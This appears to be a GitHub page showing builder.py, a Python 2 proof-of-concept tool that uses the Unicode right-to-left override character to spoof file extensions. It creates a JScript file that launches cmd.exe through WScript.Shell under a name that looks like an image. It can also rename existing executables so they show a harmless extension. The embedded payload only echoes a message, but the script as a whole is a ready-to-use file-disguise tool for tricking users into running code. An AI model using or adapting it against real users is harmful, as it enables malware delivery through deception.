-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathbuilder.py
50 lines (42 loc) · 1.54 KB
/
builder.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# PoC By: Joel A. Ossi
import os
banner = ("############################################\n"
"## Right-To-Left-Override File Generator ##\n"
"## Unicode File Extention Spoofer ##\n"
"############################################")
print(banner)
print('')
print('Note: this script needs Administrator privilidges.')
exploit = u""
def creator():
spoof = raw_input('ENTER EXTENTION TO SPOOF (Example: png): ')[::-1]
filename = raw_input('ENTER ORIGINAL FILE NAME (Example: test): ')
extention = raw_input('ENTER ORIGINAL FILE EXTENTION (Example: .js): ')
exploit = u""
file = open(filename + exploit + spoof + extention, 'w')
file.write("var run=new ActiveXObject('WSCRIPT.Shell').Run('cmd.exe /k echo RTLO ATTACK PoC');")
file.close()
print('[+] Build Saved.')
print('')
raw_input('PRESS ENTER KEY TO CONTINIUE')
def editor():
path = raw_input("LOCATION OF FILE WITH NAME WITHOUT EXTENTION (Example: C:/users/test/file): ")
spoofer = raw_input("EXTENTION TO SPOOF (Example: png): ")[::-1]
ext = raw_input("ORIGINAL FILE EXTENTION (Example: .exe): ")
os.rename(path + ext, path + exploit + spoofer + ext)
print('[+] File RTLO-Spoofed')
print("")
print('1. Create new file\n'
'2. Spoof existing file\n')
print("")
options = raw_input('Select your choice: ')
print("")
if options == '1':
creator()
elif options == '2':
editor()
else:
print("Invalid Choice.")
raw_input("PRESS ANY BUTTON TO CONTINIUE")